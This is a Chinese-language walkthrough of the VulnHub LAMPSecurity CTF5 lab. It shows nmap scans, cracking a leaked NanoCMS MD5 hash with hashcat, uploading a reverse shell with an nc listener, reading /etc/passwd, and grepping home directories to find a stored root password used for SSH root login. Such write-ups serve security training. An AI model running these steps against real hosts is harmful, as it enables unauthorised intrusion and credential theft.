LAMPSECURITY: CTF5
https://www.vulnhub.com/entry/lampsecurity-ctf5,84/
扫描主机
nmap -sn 192.168.54.0/24
扫描端口
┌──(root💀yunki)-[/home/yunki]
└─# nmap --min-rate 10000 -p- 192.168.54.138 130 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 21:01 CST
Nmap scan report for 192.168.54.138
Host is up (0.0021s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
901/tcp open samba-swat
3306/tcp open mysql
38302/tcp open unknown
MAC Address: 00:0C:29:44:6B:32 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.31 seconds
扫描服务
┌──(root💀yunki)-[/home/yunki]
└─# nmap -sT -sV -O -p22,25,80,110,111,139,143,44,901,3306,38302 192.168.54.138
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 21:02 CST
Nmap scan report for 192.168.54.138
Host is up (0.00061s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7 (protocol 2.0)
25/tcp open smtp Sendmail 8.14.1/8.14.1
44/tcp closed mpm-flags
80/tcp open http Apache httpd 2.2.6 ((Fedora))
110/tcp open pop3 ipop3d 2006k.101
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
143/tcp open imap University of Washington IMAP imapd 2006k.396 (time zone: -0400)
901/tcp open http Samba SWAT administration server
3306/tcp open mysql MySQL 5.0.45
38302/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:44:6B:32 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
Service Info: Hosts: localhost.localdomain, 192.168.54.138; OS: Unix
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.71 seconds
UDP扫描服务
┌──(root💀yunki)-[/home/yunki]
└─# nmap -sU -p22,25,80,110,111,139,143,44,901,3306,38302 192.168.54.138
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 21:03 CST
Nmap scan report for 192.168.54.138
Host is up (0.00059s latency).
PORT STATE SERVICE
22/udp closed ssh
25/udp closed smtp
44/udp closed mpm-flags
80/udp closed http
110/udp closed pop3
111/udp open rpcbind
139/udp closed netbios-ssn
143/udp closed imap
901/udp closed smpnameres
3306/udp closed mysql
38302/udp closed unknown
MAC Address: 00:0C:29:44:6B:32 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.67 seconds
nmap扫描漏洞
查看80服务
发现是nanocms系统。所以在google上搜索漏洞。
走试试看!访问http://192.168.54.138/~andy/data/pagesdata.txt
发现
发现凭据,进行md5 hash处理。
处理hash
先用hash-identifier
┌──(root💀yunki)-[/home/yunki]
└─# hash-identifier 9d2f75377ac0ab991d40c91fd27e52fd
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
再用 hashcat处理
┌──(root💀yunki)-[/home/yunki]
└─# hashcat -a 0 -m 0 9d2f75377ac0ab991d40c91fd27e52fd /usr/share/wordlists/rockyou.txt
9d2f75377ac0ab991d40c91fd27e52fd:shannon
登录ssh
登录ssh发现不对,那就应该是网页后台,来试试。
登录成功!
看看有没有上传反弹shell的位置。找到了。
先监听nc -lvnp 443
然后,访问该页面。成功获取shell
┌──(root💀yunki)-[/home/yunki]
└─# nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.138] 52934
bash: no job control in this shell
bash-3.2$ whoami
apache
提权
bash-3.2$ sudo -l
sudo: sorry, you must have a tty to run sudo
bash-3.2$ python -c "import pty;pty.spawn('/bin/sh')"
python -c "import pty;pty.spawn('/bin/sh')"
sh-3.2$ whoami
whoami
apache
sh-3.2$ sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
Password:
让我输入密码???我不知道呀。是之前的shannon吗?试了一下发现不对。查看一下有哪些用户
sh-3.2$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
torrent:x:497:496:BitTorrent Seed/Tracker:/var/spool/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
这里发现有很多用户,这些用户经常将密码放到历史记录中,尝试一下?
sh-3.2$ grep -R -i root /home/* 2>/dev/null
grep -R -i root /home/* 2>/dev/null
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note: <title>Root password</title>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note: <text xml:space="preserve"><note-content version="0.1">Root password
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:Root password
Binary file /home/patrick/.tomboy/addin-db-000/addin-dir-data/usr_lib_tomboy_c760bb4e.data matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-dir-data/usr_lib_tomboy_addins_b07dc18e.data matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.FileSystemSyncServiceAddin,0.1.maddin matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.StickyNoteImportAddin,0.1.maddin matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.EvolutionAddin,0.1.maddin matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.FixedWidthAddin,0.1.maddin matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.NoteOfTheDayAddin,0.1.maddin matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.WebDavSyncServiceAddin,0.1.maddin matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.ExportToHtmlAddin,0.1.maddin matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.BacklinksAddin,0.1.maddin matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.BugzillaAddin,0.1.maddin matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.Tomboy,0.7_ff7b1edf.mroot matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.PrintNotesAddin,0.1.maddin matches
Binary file /home/patrick/.tomboy/addin-db-000/addin-data/Tomboy.SshSyncServiceAddin,0.1.maddin matches
/home/patrick/.tomboy.log:12/5/2012 7:24:46 AM [DEBUG]: Renaming note from New Note 3 to Root password
/home/patrick/.tomboy.log:12/5/2012 7:24:56 AM [DEBUG]: Saving 'Root password'...
/home/patrick/.tomboy.log:12/5/2012 7:25:03 AM [DEBUG]: Saving 'Root password'...
这里使用grep 查找root相关内容,使用-R
递归查找,-i
忽略大小写,查找root
,在/home/
下的所有用户里查找,不输出错误信息,这里可以看到一个文件里有root password。即/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
sh-3.2$ cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns:link="http://beatniksoftware.com/tomboy/link" xmlns:size="http://beatniksoftware.com/tomboy/size" xmlns="http://beatniksoftware.com/tomboy">
<title>Root password</title>
<text xml:space="preserve"><note-content version="0.1">Root password
Root password
50$cent</note-content></text>
<last-change-date>2012-12-05T07:24:52.7364970-05:00</last-change-date>
<create-date>2012-12-05T07:24:34.3731780-05:00</create-date>
<cursor-position>15</cursor-position>
<width>450</width>
<height>360</height>
<x>0</x>
<y>0</y>
<open-on-startup>False</open-on-startup>
发现密码50$cent
尝试使用patrick:50$cent
尝试登录。
# yunki @ yunki in ~ [21:53:03] C:130
$ ssh root@192.168.54.138
root@192.168.54.138's password:
Last login: Wed Dec 5 07:28:50 2012
[root@localhost ~]# whoami
root
[root@localhost ~]# uname -a
Linux localhost.localdomain 2.6.23.1-42.fc8 #1 SMP Tue Oct 30 13:55:12 EDT 2007 i686 i686 i386 GNU/Linux
[root@localhost ~]# ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:44:6B:32
inet addr:192.168.54.138 Bcast:192.168.54.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe44:6b32/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:83445 errors:13 dropped:32 overruns:0 frame:0
TX packets:81820 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5691700 (5.4 MiB) TX bytes:7614164 (7.2 MiB)
Interrupt:18 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:160 errors:0 dropped:0 overruns:0 frame:0
TX packets:160 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:15468 (15.1 KiB) TX bytes:15468 (15.1 KiB)